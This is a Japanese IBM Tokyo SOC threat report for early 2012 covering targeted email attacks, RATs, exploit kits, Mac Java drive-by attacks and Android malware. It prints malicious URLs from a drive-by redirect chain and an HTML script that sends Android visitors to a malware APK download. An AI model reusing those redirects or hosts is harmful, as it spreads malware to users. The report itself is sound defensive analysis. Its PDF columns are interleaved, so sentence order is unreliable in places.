IBM Security Services Ahead of the Threat. ® 2012 年 上半期 Tokyo SOC 情報分析レポート 目 次 エグゼクティブ・サマリー ............................................................................. 3 1 標的型メール攻撃..................................................................................... 4 1.1 標的型メール攻撃の検知状況 .............................................................................. 4 1.2 標的型メール攻撃の傾向.................................................................................... 5 1.3 RAT (Remote Access Trojan) ........................................................................... 8 1.4 まとめ.......................................................................................................... 9 [Column1] 標的型メール攻撃が行われる時間と曜日の傾向................................................10 2 ドライブ・バイ・ダウンロード攻撃 ........................................................... 11 2.1 ドライブ・バイ・ダウンロード攻撃の推移 ............................................................11 2.2 今期のドライブ・バイ・ダウンロード攻撃の傾向 ....................................................12 2.3 まとめ.........................................................................................................15 [Column2] Android へのマルウェア自動ダウンロード......................................................16 3 WEB アプリケーションへの攻撃 ............................................................... 17 3.1 Web アプリケーションへの攻撃検知状況 ..............................................................17 3.2 SQL インジェクション攻撃 ...............................................................................18 3.3 Web アプリケーションへのその他の攻撃 ..............................................................19 3.4 まとめ.........................................................................................................20 4 今期確認された脆弱性のおさらい .............................................................. 21 4.1 今期注目を集めた脆弱性...................................................................................21 4.2 PHP の脆弱性を悪用した攻撃.............................................................................22 4.3 Telnetd の脆弱性を利用した攻撃 ........................................................................23 4.4 Microsoft Office の脆弱性を悪用した攻撃 .............................................................25 4.5 まとめ.........................................................................................................26 [Column3] リモートデスクトップの脆弱性(MS12-020)...................................................27 5 標的型攻撃対策と従来型攻撃対策のバランス ............................................... 28 5.1 攻撃者の動機と手法 ........................................................................................28 5.2 概況と対策 ...................................................................................................30 5.3 まとめ.........................................................................................................31 おわりに .................................................................................................. 32 2 2012 年上半期 Tokyo SOC 情報分析レポート エグゼクティブ・サマリー 本レポートは、IBM が全世界で提供しているセキュリティー運用監視サービス「Managed Security Services」 (MSS)の中で、世界 9 ヶ所(東京、ブリスベン、北米 4 拠点、ブリュッセル、オルトラン ディア、バンガロール)の監視センター(セキュリティー・オペレーション・センター:SOC)にて 観測したセキュリティー・イベント情報に基づき、主として日本国内の企業環境に影響を与える脅威 の動向を、東京 SOC が独自に分析し、まとめたものです。 2012 年上半期、東京 SOC が最も注視していたのは、 「標的型メール攻撃」です。今期は検知数が大 幅に増加しており、前期比約 2 倍となっています。従来の Adobe Reader/Acrobat の脆弱性を悪用す るものに加え、今期は Microsoft Office の脆弱性を悪用するものも多く検知しました。しかしながら、 ゼロデイ脆弱性が悪用されたケースは 0.2 パーセントのみでした。これは、この種の攻撃の本質が、 ゼロデイ攻撃など高度な手法により侵入を試みるものではなく、送信元や添付ファイルを偽装して受 信者を欺くソーシャル・ハッキングの手口にあることを示しています。 「ドライブ・バイ・ダウンロード攻撃」にも Windows のゼロデイ脆弱性を悪用する攻撃など、新 たな兆候が見られました。標的型攻撃でよく用いられる RAT という種類のマルウェアの感染を試みる ケースも観測しており、攻撃管理ツールである Exploit Pack にも新しいプラットフォームが複数確認 されるなど、攻撃者側のアンダーグラウンド・マーケットが活況にあることが推測されます。 「Web アプリケーションへの攻撃」として東京 SOC で検知したイベントの約 8 割は SQL インジェ クション攻撃でした。大部分は情報窃取を目的とした内容ですが、一部の Web サイトを対象とした Web サイト改ざん攻撃も継続しています。また、リモート・ファイル・インクルージョンや OS コマ ンド・インジェクションなどの攻撃も観測されています。これらの多くはコンテンツ管理システム (CMS)やフレームワークの既知の脆弱性の悪用を試みるものでした。公開サービスを運用している 環境では、CMS の追加プラグインやフレームワークの外部ライブラリなど、利用しているコンポーネ ントを把握し、脆弱性情報を追跡することが求められます。 SOC で対応したセキュリティー・インシデントを動機別に分類すると、標的型攻撃など「諜報活動」 に分類される事案は全体の約 0.4 パーセントでした。多くの環境では、マルウェア感染や Web サーバ ー攻撃など「金銭目的」の従来型脅威への対策が目下の課題であると言えます。組織の性質に合わせ、 実際の攻撃傾向を踏まえて、基礎となる「従来型攻撃対策」を行った上で、必要な「標的型攻撃対策」 を組み立てることが重要です。 本レポートでは上記のトピックに関する解説に、 「標的型メール攻撃が送信される時間と曜日の傾 向」、「Android へのマルウェア自動ダウンロード」、「リモートデスクトッププロトコルの脆弱性 (MS12-020)」をとりあげた 3 つのコラムを交えて、2012 年上半期の脅威動向を紹介いたします。 これらの情報を、セキュリティー・ポリシーの策定や、情報セキュリティー対策を検討する際の参 考として、また、情報セキュリティーに関する知識向上の一助として、ご活用いただければ幸いです。 3 2012 年上半期 Tokyo SOC 情報分析レポート 1 標的型メール攻撃 2011 年に引き続き、2012 年も標的型メール攻撃による被害の報道が相次いでいます。標的型メー ル攻撃は、ある特定の組織や個人に限定して不正なメールを送信する攻撃手法で、東京 SOC でも継続 してこの攻撃を確認しています。また、前期に比べると攻撃検知数が約 2 倍に増加しています。 本章では、今期東京 SOC で確認した標的型メール攻撃の特徴について解説します。 1.1 標的型メール攻撃の検知状 況 今期も東京 SOC では多数の標的型メール攻撃を確 認しました。2011 年下半期に比べると、2012 年上半 期には検知数が約 2 倍に上昇しています(図 1) 。標的 型メール攻撃は、添付ファイルとして攻撃コードを送 ることが可能な脆弱性が新たに発見されると、一時的 に攻撃が増加する傾向があります。今期は、このよう な脆弱性が複数確認されたために、攻撃が増加したも のと考えられます。 今期確認された攻撃は以前までと同様に不正なファ イルが添付されたタイプが多くを占めています。 の業種別割合です。政府関係機関が多くを占める傾向 がありますが、その他にも製造業企業や金融機関、社 会インフラ企業など様々な組織が攻撃を受けています。 また、大企業ばかりでなく、中小企業に対して標的型 メール攻撃が行われる事例が多数確認されています。 送信元のメールアドレスに関しては、フリーメール サービスのアドレスや go.jp などの政府関係機関に偽 装したアドレス、ターゲット組織のアドレスに偽装し たものが多く利用されています。 以降では今期確認された標的型メール攻撃の傾向に ついて解説します。 小売業 4% 120 100 図 2 は標的型メール攻撃のターゲットとなった組織 建設 4% 検知数 サービス 1% 政府関係機 関 25% 社会インフラ 6% 80 教育 3% 製造業 9% 60 40 報道機関 23% 金融 12% 20 0 2011年下半期 2012年上半期 図 1 標的型メール攻撃の検知件数比較 (東京 SOC 調べ: 2011 年 7 月~2012 年 6 月) 化学 13% 図 2 標的型メール攻撃のターゲットとなった組織の業種別割合 (東京 SOC 調べ: 2012 年 1 月~2012 年 6 月) 4 2012 年上半期 Tokyo SOC 情報分析レポート 標的型メール攻撃 1.2 標的型メール攻撃の傾向 2 月から 3 月にかけて最も多く確認される標的型メ ール攻撃はインフルエンザの情報を装ったものです。 本節では、今期東京 SOC で検知した標的型メール 攻撃の傾向を紹介します。 このようなメールは毎年確認されており、今年も複数 確認しています。また、子ども手当(2 月 13 日 子ど も手当.pdf)や、原発再稼働(4 月 17 日 大飯原発の 再稼働に反対する署名用紙.doc)など 2012 年上半期 検知事例 表 1 は、実際に東京 SOC にて確認した不正なメー ルに添付されていたファイルの名称と悪用する脆弱性 の例です。これらの不正な添付ファイルには、マルウ ェアやダミーで表示されるドキュメント・ファイルが 組み込まれています。そのため、脆弱性のあるアプリ ケーションで、これらのファイルを開いた場合、ダミ ーのファイルが表示されて正常なファイルに見せかけ ておきながら、バックグラウンドではマルウェアの感 染が行われています。 に話題となったニュースに便乗するものも確認されて います。 その他にも、名簿や本人確認書類、扶養親族届など 受信した個人に関連する情報に見せかけたメールも多 数確認されています。 さらに、一覧には含めていませんが、攻撃者によっ て盗まれたメールの内容が悪用されたと考えられる不 正なメールや、ターゲットとなった組織の関係者しか 分からない情報を含めたタイプの攻撃も複数確認され ています。 表 1 不正なメールに添付されていたドキュメント・ファイルの一例 検知日 添付ファイル名 悪用する脆弱性 2012年01月04日 平成22年7月.pdf Adobe Readerの脆弱性 (CVE-2010-2883) 2012年01月22日 梅花exel.xls Adobe Flash Playerの脆弱性 (CVE-2011-0611) 2012年02月13日 扶養親族届.pdf Adobe Readerの脆弱性 (CVE-2010-0188) 2012年02月13日 子ども手当.pdf Adobe Readerの脆弱性 (CVE-2010-0188) 2012年02月26日 本人確認書類001.pdf Adobe Readerの脆弱性 (CVE-2010-0188) 2012年03月28日 インフルエンザの予防等基礎知識.doc Adobe Flash Playerの脆弱性 (CVE-2012-0753) 2012年04月17日 大飯原発の再稼働に反対する署名用紙.doc Windows コモン コントロールの脆弱性 (MS12-027 : CVE-2012-0158) 2012年04月17日 献金を受け取る機構及び人のリスト.doc Windows コモン コントロールの脆弱性 (MS12-027 : CVE-2012-0158) 2012年04月19日 日本が尖閣問題にこだわる6つの理由.doc Windows コモン コントロールの脆弱性 (MS12-027 : CVE-2012-0158) 2012年04月24日 履歴書.doc Windows コモン コントロールの脆弱性 (MS12-027 : CVE-2012-0158) 2012年04月26日 201204名簿(更新).doc Windows コモン コントロールの脆弱性 (MS12-027 : CVE-2012-0158) 2012年05月22日 計画停電スケジュール.doc Windows コモン コントロールの脆弱性 (MS12-027 : CVE-2012-0158) 5 2012 年上半期 Tokyo SOC 情報分析レポート 標的型メール攻撃 メール受信間隔 携によって前もって不正なメールの情報を入手するこ 標的型メール攻撃の中には、単一の組織のみを対象 とで事前対策を打つことができる可能性があります1。 に行われるものと、複数の組織にまたがって行われる 送信される数が少ないものに関しては、短い時間で ものの 2 つのパターンが存在します。 東京 SOC では、 攻撃が実施されることが多いため(表 2 の右の例) 、 複数組織を対象にした標的型メール攻撃を複数確認し 情報を入手した時点ですでにすべての標的型メール攻 ています。 撃が行われた後である可能性があります。しかし、不 表 2 は複数組織に送信された不正なメールを検知し 正なメールについて把握しておくことは無駄にはなり た日時を表しています。表 2 の左の例にあるように検 ません。後日、遡って攻撃の痕跡を探す材料として活 知数が多いものに関しては、比較的長い時間かけて多 用することができます。 くの組織に向けて送信されていることが分かります。 初めの検知から最後の検知まで約 18 時間のタイムラ グがあります。 このような複数の組織にまたがって比較的多く実施 される標的型メール攻撃に関しては、組織内外の情報連 1 複数の政府省庁や民間団体などが情報連携などによる標的 型攻撃対策を実施または検討しています。日本アイ・ビー・エム が参加する日本セキュリティオペレーション事業者協議会 (ISOG-J)においても、ワーキンググループを発足させて標的型 攻撃への対策を検討しています。 http://www.jnsa.org/isog-j/ 表 2 複数組織に送信された標的型メール攻撃の検知日時の一例 検知日時 ターゲット組織 検知日時 ターゲット組織 2012/3/28 12:36 A社 2012/4/9 2012/4/9 2012/4/9 2012/4/9 2012/4/9 2012/4/9 14:46 14:46 15:06 15:11 15:15 15:26 A社 A社 B社 C社 D社 E社 2012/4/9 2012/4/9 2012/4/9 2012/4/9 15:26 15:28 15:50 16:16 C社 E社 C社 F社 2012/4/9 16:16 2012/4/9 16:20 2012/4/9 16:20 G社 C社 C社 2012/4/9 16:26 H社 2012/4/9 16:26 2012/4/9 16:37 2012/4/9 20:00 2012/4/10 8:28 C社 C社 C社 H社 2012/3/28 12:44 B社 2012/3/28 12:45 A社 2012/3/28 12:48 A社 6 2012 年上半期 Tokyo SOC 情報分析レポート 標的型メール攻撃 添付ファイル 異なるものの、感染するマルウェアなどが同じタイプ 不正なメールに添付されるファイルに不正なドキュ のものでした。この脆弱性を悪用する PoC2は 4 月 25 メント・ファイルが多いという傾向は、以前から継続 日頃まで公開されていなかったため、脆弱性の詳細を しています。 事前に把握していた同一人物もしくはグループが複数 図 3 は添付されていた不正なファイルの拡張子の割 の組織に対して比較的広範囲に攻撃を行っていたので 合を示しています。ドキュメント・ファイル(PDF、 はないかと推測しています。 DOC、XLS、RTF)が利用された割合は、全体の 94% なお、2011 年に DOC ファイル、PDF ファイルと に上ります。 並んで多く確認されていた XLS ファイルに関しては、 最も多く悪用されたファイルの拡張子は、PDF です。 今期検知件数が大幅に減少しています。これまで、XLS 2012 年前半は Adobe Reader/Acrobat の脆弱性を悪 ファイルに関しては、ほとんどが 2009 年に確認され 用する攻撃がみられたため、PDF ファイルの検知数が た脆弱性(CVE-2009-3129)を攻撃するものでした 多くなっています。 が、今期は新しい脆弱性の出現に合わせてそれらを悪 しかし、4 月 11 日に Microsoft Office が対象とな る脆弱性(MS12-027)が報告され、4 月 17 日以降 この脆弱性を悪用した攻撃が増加するとともに、DOC ファイルを悪用する事例が増加しました。この際に利 用する攻撃コードへの切り替えが進み、それにあわせ て XLS ファイルの利用も減少したと考えられます。 2 脆弱性を実証する目的で公開される攻撃コード(Proof of Concept) 用された不正な DOC ファイルの多くがファイル名は 3% 6% 6% 54% PDF DOC XLS RTF EXE/ZIP 31% 図 3 不正なメールに添付されていた不正なファイルの拡張子(東京 SOC 調べ: 2012 年 1 月~2012 年 6 月) 0.2% 既知の脆弱性 ゼロデイ脆弱性 99.8% 図 4 不正なメールに添付されていた不正なドキュメント・ファイルの悪用する脆弱性の割合 (東京 SOC 調べ: 2011 年 1 月~2012 年 6 月) 7 2012 年上半期 Tokyo SOC 情報分析レポート 標的型メール攻撃 悪用される脆弱性 ・キー入力の監視 一部で“標的型メール攻撃にはゼロデイ脆弱性が利用 ・Webcam による盗撮 されることがあるため対応が難しい”と言われることが ・マイクによる盗聴 あります。実際にゼロデイ脆弱性が悪用されることもあ ・スクリーンキャプチャ など りますが、多くの場合は既知の脆弱性が用いられます。 図 4 は不正なメールに添付される不正なドキュメン RAT は多機能であるばかりでなく、種類によっては、 ト・ファイルが悪用する脆弱性の割合を表しています。 Web サイトからダウンロードしてきて、無料で利用可 東京 SOC で確認した攻撃の中でゼロデイ脆弱性が利 能なものが存在します。そのため、標的型攻撃のみな 用されていたものわずか 0.2%でした。このことから、 らず、RAT は昔からさまざまな攻撃行為に使用されて クライアントアプリケーションが最新のバージョンで います。 あれば、不正な添付ファイルを開いてもマルウェアに 実際に、最近の標的型メール攻撃において Poison 感染することはほとんどないため、標的型メール攻撃 Ivy や、Hupigon、Bifrost、Gh0st RAT などの RAT の被害を受けにくくなることが分かります。 が利用されていることを確認しています。 1.3 RAT (Remote Access Trojan) また、これらの RAT は主に Windows OS 上で管理 するように作成されています。そのため、このような RAT が利用されている攻撃では、感染したマルウェア 標的型メール攻撃で感染するマルウェアに、RAT と 呼ばれるものが利用されていることがあります。RAT とは、リモートからコンピュータに接続してコントロ ールするためのアプリケーションです。これを利用す れば、マルウェア感染したシステムに対してリモート から以下のような操作を行えます。 が自動接続するコントロールサーバーに Windows OS が利用されています。なお、東京 SOC で確認した RAT のコントールサーバーは、中国語環境など日本語 環境以外の Windows OS が利用されていました。 図 5 は、リモートの感染マシンをコントロールして いる Poison Ivy という RAT を使用している画面です。 ほとんどの RAT はこのように GUI で管理できるよう ・アプリケーションの操作 になっているため、誰でも簡単に操作することが可能 ・不正なファイルの実行 ・コンピュータ内に保存されたファイルの漏えい です。 図 5 Poison Ivy のコントロール画面 8 2012 年上半期 Tokyo SOC 情報分析レポート 標的型メール攻撃 1.4 まとめ ぼすべてのシステムが乗っ取られた場合と同等の状況 になります。 今期の東京 SOC の観測では、標的型メール攻撃の 検知件数は上昇し、また悪用される脆弱性も比較的新 しいものが多くなっています。標的型メール攻撃を想 定して様々な対策を講じる組織が増えたことで、攻撃 者は新たな攻撃手法を取り入れようと積極的になって いることが伺えます。 攻撃者は、標的型メール攻撃でマルウェアを感染さ せた後、内部サーバーへの不正侵入を行う事例がいく つか確認されています。内部サーバーの中でも特にア カウントサーバー(Active Directory など)を乗っ取 る事例が多いようです。組織内のシステムを管理する アカウントサーバーが乗っ取られた場合、組織内のほ 標的型メール攻撃は、攻撃の一段階に過ぎません。 ゲートウェイ型アンチウイルスや DMZ 境界への IDPS 設置、メール攻撃の演習(予防接種)などの対策は重 要ですが、このような標的型メール攻撃の対策ばかり に注力していると、標的型メール攻撃を防げなかった 場合に、前述のアカウントサーバーへの侵入など、組 織内部で自由に活動されてしまいます。標的型攻撃の 対策を考える際は、不正なメールへの対策だけでなく、 内部ネットワークで不正な挙動を検出するための対策 や、内部サーバーの堅牢化、重要情報漏えいの防止な ど多層防御の仕組みを取り入れることで、1 つのポイ ントで防げない場合に他の対策によって守ることがで きる仕組みを構築することが重要です。 9 2012 年上半期 Tokyo SOC 情報分析レポート [Column1] 標的型メール攻撃が行われる時間と曜日の傾向 インターネット上で行われる攻撃は、常時一定の頻度に行われることは少なく、時間帯や曜日によって 攻撃の頻度が変化することがよくあります。この攻撃頻度の変化は、攻撃者の活動ペースに関係している と考えられるため、攻撃者のプロファイリングに活用できるかもしれません。 標的型メール攻撃に関しても、攻撃の行われる時間と曜日に傾向があります。図 6 は標的型メール攻撃 の曜日別の検知数を表しています。 100 90 80 70 60 50 40 30 20 10 0 検知数 Sun Mon Tue Wed Thu Fri Sat 図 6 不正なメールが送信される曜日別件数(東京 SOC 調べ: 2011 年 1 月~2012 年 6 月) 標的型メール攻撃の多くは、平日(月曜日から金曜日)に行われることが多い傾向にあります。さらに、 図 7 は標的型メール攻撃の時間帯別の検知数を表しています。 60 検知数 50 40 30 20 10 0 0 2 4 6 8 10 12 14 16 18 20 22 時間 (JST) 図 7 不正なメールが送信される時間帯別件数(東京 SOC 調べ: 2011 年 1 月~2012 年 6 月) 攻撃が最も行われているのは、9 時から 17 時までであることが分かります。また、2 時から 7 時まで は攻撃が行われていないという特徴があります。この攻撃時間帯と曜日の特徴から攻撃者は、日本の一般 的な就業時間帯を中心に攻撃を行っていることが分かります。 ここからはあくまで推測になりますが、攻撃者は日本の就業時間帯を中心に攻撃を行っていることから、 日本と同じまたは時差の近い国から攻撃を行っていることが予想されます。もしかすると、そのように推 測できるように仕向けるためにあえてこのような頻度で攻撃を行っているのかも知れません。また、攻撃 をトラフィックが多い就業時間帯に行うことで、攻撃に気付かれないようにしている可能性もあります。 攻撃頻度の情報だけでは、攻撃者の意図は推測の範囲を出ませんが、このように攻撃の傾向に顕著な差 が出るということは、攻撃者がこの時間帯・曜日に攻撃を集中させる何らかの理由があると考えられます。 10 2012 年上半期 Tokyo SOC 情報分析レポート 2 ドライブ・バイ・ダウンロード攻撃 昨今、標的型攻撃ばかりに注目が集まっていますが、他の攻撃も活発に行われています。特に、ド ライブ・バイ・ダウンロード攻撃は、標的型メール攻撃に比べて数十倍以上の数の攻撃を毎日確認し ています。この攻撃によるマルウェア感染の被害は後を絶ちません。 本章では、今期東京 SOC で確認したドライブ・バイ・ダウンロード攻撃の特徴について解説します。 2.1 ドライブ・バイ・ダウンロード 攻撃の推移 ドライブ・バイ・ダウンロード攻撃の特徴の一つです。 これは、週末に改ざんされた Web サイトが修正され ずに放置されたままになっていることが多いため、休 ドライブ・バイ・ダウンロード攻撃は、PC 内に無 許可にマルウェアをインストールする攻撃手法です。 攻撃者は、一般の Web サイトを不正に改ざんしてお き、それを閲覧したユーザーを自動的に不正な攻撃サ ーバーへリダイレクトし、クライアント PC の脆弱性 を悪用して、マルウェアに感染させます。 図 8 は、今期の東京 SOC におけるドライブ・バイ・ ダウンロード攻撃検知数の推移です。今期は、1 月頃 に Java の脆弱性を悪用する攻撃が多発していたため、 検知数が上昇しています。 平均すると一日に約 10 件、 日明けに攻撃が増加すると考えられます。例えば、ゴ ールデンウィーク明けの 5 月 7 日は大量の攻撃を確認 しています(図 8 を参照) 。 ドライブ・バイ・ダウンロード攻撃で感染するマル ウェアとして、今期多く確認されたのは偽ウイルス対 策ソフトを代表とするスケアウェア3でした。一部の攻 撃では標的型メール攻撃にも利用される RAT4を感染 させようとする事例も確認されています。 次節では、今期東京 SOC で確認したドライブ・バ イ・ダウンロード攻撃の特徴について解説します。 3 多い時には 100 件程の攻撃を検知しています。 ドライブ・バイ・ダウンロード攻撃は、不正に改ざ んされた Web サイトを閲覧することで攻撃を受ける ため、アクセス数の多いサイトが改ざんされると検知 クライアント PC がマルウェアに感染しているなどの嘘の警告を 表示し、ユーザーを脅して有料のソフトウェアやサービスを購入 させようとするマルウェア 4 RAT について、詳しくは「1.3 RAT(Remote Access Trojan)」をご 参照ください。 数は増加します。また、月曜日に攻撃が増加するのも 2012/06/24 2012/06/03 2012/05/27 2012/05/20 2012/05/13 2012/05/06 2012/04/29 2012/04/22 2012/04/15 2012/04/08 2012/04/01 2012/03/25 2012/03/18 2012/03/11 2012/03/04 2012/02/26 2012/02/19 2012/02/12 2012/02/05 2012/01/29 2012/01/22 2012/01/15 2012/01/08 2012/01/01 2012/06/17 攻撃検知件数 約400件の イベントを検知 2012/06/10 200 180 160 140 120 100 80 60 40 20 0 図 8 ドライブ・バイ・ダウンロード攻撃検知件数(東京 SOC 調べ:2012 年 1 月 1 日~2012 年 6 月 30 日) 11 2012 年上半期 Tokyo SOC 情報分析レポート ドライブ・バイ・ダウンロード攻撃 2.2 今期のドライブ・バイ・ダウン ロード攻撃の傾向 Exploit Pack ドライブ・バイ・ダウンロード攻撃を行う攻撃者は、 Exploit Pack と呼ばれる攻撃管理ツールを利用するこ とが常套手段となっています。この攻撃ツールはアン 脆弱性 ドライブ・バイ・ダウンロード攻撃は、マルウェア を感染させるためにアプリケーションの脆弱性を悪用 します。東京 SOC で最も多く観測されるのは Java Runtime Environment(JRE)の脆弱性を悪用する攻 撃です。また、Adobe Reader や Adobe Flash Player の脆弱性も悪用されることが多い傾向にあります。こ れは、以前までの傾向と変わりません5。 さらに、今期は Windows の脆弱性がドライブ・バ イ・ダウンロード攻撃に悪用される事例が複数確認さ れています。2 月 2 日に Windows Media の脆弱性 (MS12-004)の悪用が確認され、6 月 17 日には Internet Explorer の脆弱性(MS12-037) 、さらにそ の 3 日後の 6 月 20 日には XML コアサービスの脆弱 性(MS12-043)を悪用するゼロデイ攻撃が確認され ました。このように Windows の脆弱性がドライブ・ バイ・ダウンロード攻撃に悪用されることは最近見ら れていませんでしたが、今期は 3 件も確認されていま す。 ダーグラウンドで売買されているもので、東京 SOC ではこのようなツールを利用した攻撃を多数検知して います。 今期検知した Exploit Pack の中で検知数の多い上位 5 件を表 3 に示します。最も多く検知したのは、 Incognito Exploit Kit です。このツールは、2011 年 7 月頃から使われるようになったものです。 次に多く検知したのは、Blackhole Exploit Kit です。 このツールによる攻撃は 2011 年 2 月頃から検知数が 増加し、今でも定期的にツールのアップデートが行わ れています。 さらに、名称は不明ですが、5 月頃から偽ウイルス 対策ソフトをダウンロードさせようとする新たなツー ル(表 3 No.3)を大量に検知するようになったり、 RedKit や Sakura Exploit Pack などこれまでは利用さ れてこなかった新たなツールが登場しています。 これらのツールの多くが、4 月に公開された JRE の 脆弱性(CVE-2012-0507)を悪用するようにアップ デートされているため、ドライブ・バイ・ダウンロー ド攻撃の攻撃者が、JRE の脆弱性を積極的に取り入れ ようとしている意図が読み取れます。 5 ドライブ・バイ・ダウンロード攻撃に悪用される脆弱性の割合に ついては「2011 年下半期 Tokyo SOC 情報分析レポート」の“2.3 マルウェア・ダウンロード発生原因の調査”をご参照ください。 http://www-935.ibm.com/services/jp/iss/pdf/tokyo_soc_report2 009_h2.pdf 表 3 Exploit Pack 別マルウェアダウンロード発生件数(上位 5 件) (東京 SOC 調べ:2012 年 1 月 1 日~6 月 30 日) No. Exploit kit Name マルウェア・ダウンロード 2011年下半期順位 検知数 1 Incognito Exploit Kit 276 2 (↑) 2 Black Hole Exploit Kit 194 1 (↓) 3 名称不明 ※ 179 - (New) 4 RedKit 48 - (New) 5 Sakura Exploit Pack 32 - (New) ※ 1.htmlや2.html、3.htmlなどの[数字].htmlファイル(マルウェア)をダウンロードさせる特徴があります。 12 2012 年上半期 Tokyo SOC 情報分析レポート ドライブ・バイ・ダウンロード攻撃 Mac OS を対象とした攻撃 この一連の攻撃は、Mac OS をターゲットにしてい これまで、ドライブ・バイ・ダウンロード攻撃は るように見せかけて、実は Windows OS も攻撃する Windows OS を対象とした攻撃ばかりで、他の OS 向 ような仕組みを持っていました。図 9 は、2 月頃から けの攻撃が行われることはありませんでした。しかし、 確認されていたドライブ・バイ・ダウンロード攻撃の 今期 Mac OS 向けのドライブ・バイ・ダウンロード攻 アクセス遷移を表しています。 撃が初めて確認されました。これまでも Web サイト ユーザーが誘導される不正なサイトでは、アクセス 経由で Mac OS に対してマルウェアを感染させようと してきたクライアント PC の User-Agent によって次 する攻撃は確認されていましたが、手動でユーザーが の誘導先を振り分けていました。User-Agent が Mac インストールしなければ感染することはありませんで OS の場合には、最終的に不正な Jar ファイルをダウ した。 ンロードさせるサイトに誘導しますが、User-Agent 今期確認した Mac OS 向けのドライブ・バイ・ダウ が Windows OS の場合には、偽ウイルススキャン ンロード攻撃は、 JRE の脆弱性を悪用するものでした。 Web サイト(手動でランサムウェア7をインストール 2 月頃から JRE の脆弱性を悪用する攻撃が始まり、3 させるサイト)に誘導します。 月末頃からは Mac OS ではアップデートが公開されて いない JRE の脆弱性(CVE-2012-0507)が悪用され るようになったことで多数の Mac OS システムにマル ウェアが感染したことが確認されています6。 MAC OSでアクセスした場合 Windows OSでアクセスした場合 共通 6 2 月から感染が拡大した Java の脆弱性を悪用して感染する Mac OS 向けのマルウェアは一部で Flashback とよばれていま す。 7 PC のファイルやシステムを使用不能にし、復旧の条件として金 銭を要求するマルウェア [改ざんされたWebサイト] (WordPressを利用したサイトが多い) onfu38rther.rr.nu/nl.php?p=d ※1 ieved92lebano.rr.nu/n.php?h=1&s=nl urnsa04ndini.rr.nu/n.php?h=1&s=nl ※1 processesscannerprevention.info/ 39f678a0d39279b6/4/ (偽ウイルススキャンWebサイト) Google Webサイト Javaがインストールされてない場合 godofwar3.rr.nu/2f/ JavaScript OFFの場合 godofwar3.rr.nu/2f/al-2.jar ※2 (Javaの脆弱性を悪用するコード) godofwar3.rr.nu/aw.php マルウェアダウンロード godofwar3.rr.nu/aww.php ※1 2回目以降のアクセスは、IPアドレスでアクセス制御されているため、アクセス不可 ※2 1回目のアクセスで、Cookieが設定されると、2回目以降アクセス不可 図 9 Mac OS に対してドライブ・バイ・ダウンロード攻撃を行う事例 13 2012 年上半期 Tokyo SOC 情報分析レポート ドライブ・バイ・ダウンロード攻撃 ま た、こ の事例 とは別に User-Agent によっ て ました。特に、ウイルス対策ソフトや HDD 復旧ソフ Windows、Mac、Linux を識別して攻撃している事例 ト、デフラグソフトなどに扮したタイプのマルウェア (図 10 左)や、不正な Jar ファイル内で OS の種類 が多く見られています。 を判定して、その OS に対応するマルウェアをインス 図 11 は、「Ultra Defragger」と呼ばれる種類のラ トールしようとするマルチプラットフォーム対応の攻 ンサムウェアと、ある偽ウイルス対策ソフト(Fake 撃コード(図 10 右)も確認されています。 AV)がダウンロードされる通信の検知数の推移です。 ドライブ・バイ・ダウンロード攻撃は、このように 期間を通して継続的に検知していることが分かります。 アクセスしてくるクライアント PC の OS 種類を判別 この種のマルウェアは定期的に名前や外観を変更しな して攻撃内容を選択するように進化しています。 がら、長期間にわたって様々な Web サイト経由で感 染が行われています。「Ultra Defragger」も 2010 年 ランサムウェア 頃から登場し、現在でも様々な亜種が登場しています。 今期もドライブ・バイ・ダウンロード攻撃によって ランサムウェアに感染させられる事例が多数確認され 図 10 OS を識別して Java の脆弱性を悪用する事例 (左:User-Agent を識別する不正なサイト 右:不正な Jar ファイル内で OS を識別する攻撃) 25 Ultra Defragger FakeAV 20 15 10 5 2012/06/24 2012/06/17 2012/06/10 2012/06/03 2012/05/27 2012/05/20 2012/05/13 2012/05/06 2012/04/29 2012/04/22 2012/04/15 2012/04/08 2012/04/01 2012/03/25 2012/03/18 2012/03/11 2012/03/04 2012/02/26 2012/02/19 2012/02/12 2012/02/05 2012/01/29 2012/01/22 2012/01/15 2012/01/08 2012/01/01 0 図 11 「Ultra Defragger」および「ある偽ウイルス対策ソフト」の検知推移 (東京 SOC 調べ:2012 年 1 月 1 日~2012 年 6 月 30 日) 14 2012 年上半期 Tokyo SOC 情報分析レポート ドライブ・バイ・ダウンロード攻撃 2.3 まとめ などのサードパーティーのアプリケーションの脆弱性 放置が原因となっています。サードパーティーのアプ 今 期 の ドラ イ ブ・ バ イ・ ダ ウ ンロ ー ド攻 撃 は、 Windows OS の脆弱性を悪用する攻撃がいくつも確 認された上に、ゼロデイ攻撃まで発生しました。しか し、大多数の攻撃は現在でも JRE や Adobe Reader、 Adobe Flash Player の脆弱性を中心に行われていま す。これらのアプリケーションについても今期は複数 の脆弱性が発見され、攻撃者の格好のターゲットとな っていました。 Windows OS の脆弱性に関しては、自動アップデー トの普及に よりすぐにパッチが適用さ れるため、 Windows OS の脆弱性の影響によって被害が発生す リケーションを含めたパッチ・アップデート管理を行 うことが重要です。 また、JRE は現在バージョン 7 が推奨バージョンと なっており、バージョン 6 は 2012 年 11 月にサポー トが終了することがアナウンスされています8。JRE の バージョンによって動作しないアプリケーションがあ るなど、環境によっては簡単にアップデートすること ができない場合もあると思われますが、早いうちから バージョン 7 へのアップデートの準備を進めておくこ とを推奨します。 8 https://blogs.oracle.com/henrik/entry/updated_java_6_eol_date る事例は少なく、実際に被害を受けるケースでは JRE 15 2012 年上半期 Tokyo SOC 情報分析レポート [Column2] Android へのマルウェア自動ダウンロード 2 章で紹介したように、今期は Windows OS だけでなく Mac OS でもドライブ・バイ・ダウンロード 攻撃が確認されました。他の OS でも同様の攻撃が発生しないとは言えません。特に最近マルウェアが増 加しているスマートフォン向け OS である Android OS は、今後ターゲットにされることが予想されます。 2012 年 7 月時点では、Android OS へのドライブ・バイ・ダウンロード攻撃は確認されていませんが、 マルウェアを自動的にダウンロードさせる(自動インストールまでは行わない)これまで見られなかった 攻撃が今期確認されています。 この攻撃は、改ざんされた Web サイトから行われていました。改ざんされた Web サイト内に、アクセ スしてきた端末を不正なサイトに誘導する Iframe タグが挿入されており、アクセスしたユーザーは自動的 に不正なサイトに誘導されます。不正なサイトでは、アクセスした端末の User-Agent 内に“Android” の文字列が含まれていた場合に、 以下のような APK ファイルをダウンロードさせる HTML を返信します。 (User-Agent 内に“Android”が含まれていないと APK ファイルのダウンロードは行われません) <html><head></head><body><script type="text/javascript">window.top.location.href = "http://androidonlinefix.info/fix1.php";</script></body></html> 図 12 不正なサイトから返信された APK ファイルをダウンロードさせようとする HTML そして、ダウンロードされた APK 